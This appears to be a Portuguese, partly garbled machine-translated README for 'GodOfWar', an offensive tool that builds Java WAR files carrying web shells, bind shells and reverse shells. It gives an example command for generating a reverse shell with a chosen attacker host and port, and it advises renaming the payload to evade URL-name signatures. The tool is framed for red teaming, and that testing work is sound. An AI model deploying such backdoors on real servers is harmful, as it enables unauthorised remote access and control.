GodOfWar – Malwared Java WAR Builder com payloads embutidos

Uma ferramenta de linha de comando para gerar cargas úteis de guerra para fins de testes de penetração / red teaming , escritos em ruby.
Características
- Cargas úteis pré-existentes. (tente
-l/--list
)- cmd_get
- navegador de arquivos
- bind_shell
- reverse_shell
- reverse_shell_ui
- Backdoor configurável. (tente
--host/-port
) - Controle sobre o nome da carga útil .
- Para evitar o nome mal-intencionado após a implantação para ignorar as assinaturas de nomes de URL.
Instalação
$ gem install godofwar
Uso
$ godofwar -h
Help menu:
-p, --payload PAYLOAD Generates war from one of the available payloads.
(check -l/--list)
-H, --host IP_ADDR Local or Remote IP address for the chosen payload
(used with -p/--payload)
-P, --port PORT Local or Remote Port for the chosen payload
(used with -p/--payload)
-o, --output [FILE] Output file and the deployment name.
(default is the payload original name. check '-l/--list')
-l, --list list all available payloads.
-h, --help Show this help message.
Exemplo
Listar todas as cargas úteis
$ godofwar -l
├── cmd_get
│ └── Information:
│ ├── Description: Command execution via web interface
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settings required!"}
│ ├── Usage: http://host/cmd.jsp?cmd=whoami
│ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│ └── Information:
│ ├── Description: Remote file browser, upload, download, unzip files and native command execution
│ ├── OS: any
│ ├ ;── Settings: {"false"=>"No Settings required!"}
│ ├── Usage: http://host/filebrowser.jsp
│ ├── References: ["http://www.vonloesch.de/filebrowser.html"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│ └── Information:
│ ├── Description: TCP bind shell
│ ├── OS: any
│ ├── Settings: {"port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse-shell.jsp
│ ├── References: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│ └ ── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│ └── Information:
│ ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse_shell_ui.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│ └── Information:
│ ├── De scription: TCP reverse shell. LHOST and LPORT are hardcoded
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse_shell.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
Gere payload com LHOST e LPORT
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
Após a implantação, você pode visitar o seu escudo em ( http: // host: 8080 / cachorro / puppy.jsp )
Contribuindo
- Bifurque-o ( https://github.com/KINGSABRI/godofwar/fork ).
- Crie sua ramificação de funcionalidades (git checkout -b my-new-feature).
- Confirme suas alterações (git commit -am ‘Add some feature’).
- Empurre para o ramo (git push origin my-new-feature).
- Crie uma nova solicitação de extração.
Adicionar mais backdoors
Para contribuir adicionando mais backdoors:
- crie uma nova pasta no
payloads
diretório. - coloque seu
jsp
arquivo sob o diretório recém-criado (torne-o o mesmo nome de diretório). - atualizar
payloads_info.json
arquivo com- descrição.
- sistema operacional suportado (tente torná-lo universal).
- configurações: host e porta padrão.
- Referências: a origem da carga útil ou seus créditos de criador.